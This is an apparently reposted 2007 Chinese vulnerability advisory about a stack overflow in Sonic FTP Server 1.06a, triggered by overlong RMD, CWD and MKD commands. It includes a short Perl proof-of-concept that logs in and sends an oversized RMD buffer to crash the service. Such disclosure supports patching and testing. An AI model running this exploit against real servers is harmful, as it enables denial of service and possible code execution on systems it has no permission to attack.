SonicFTPServer远程超长命令堆栈溢出
作者:佚名 文章来源:不详 点击数: 更新时间:2007-4-20 21:48:12
受影响系统:
Sonic FTP Server v1.06a
描述:
Sonic FTP Server 是一款免费软件。
Sonic FTP Server在处理包含超长字符串时多个命令存在问题,远程攻击者可以利用这个漏洞
对FTP服务程序进行拒绝服务攻击。
FTP服务程序对一些包含超长字符串的RMD、CWD、MKD命令缺少正确的边界缓冲区检查,可导致触
发基于栈的溢出,精心构建提交数据,可能以服务进程权限执行任意指令。
验证代码:
use IO::socket::INET; $host = "192.168.1.71"; $port = 21; $buffer = "A" x 506; $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port) || die "[!] Unable to connect to $host\n"; for($i = 1; $i < 10; $i++) { $socket->recv($recvbuf,200); print $recvbuf; } print $socket "USER 1\r\n"; $socket->recv($recvbuf,200); print $recvbuf; print $socket "PASS 1\r\n"; for($i = 1; $i < 10; $i++) { $socket->recv($recvbuf,200); print $recvbuf; } print $socket "RMD $buffer\r\n"; $socket->recv($recvbuf,200); print $recvbuf; close($socket);
相关专题:
 网友评论:(评论内容只代表网友观点,与本站立场无关!) |
- GOOGLE广告
阅读排行
- 相关文章
-
最好的防火墙ZoneAlarm设置全攻略(图)
Microsoft Windows Metafile (WMF) SetAbortProc …
Apache2的httpd.conf翻译(1)
Microsoft Windows / Internet Explorer WMF Remo…
notes.ini的配置
送给solaris x86新手的大礼包(全程学习疑难指导)…
eStara SoftPhone 3.0.x SIP Packets Handling Re…
LOTUS NOTES .INI文件参数设置秘籍…
Microsoft Windows RPC Memory Allocation Remote…
2007 Microsoft Office RTM 图片赏(1)…
|
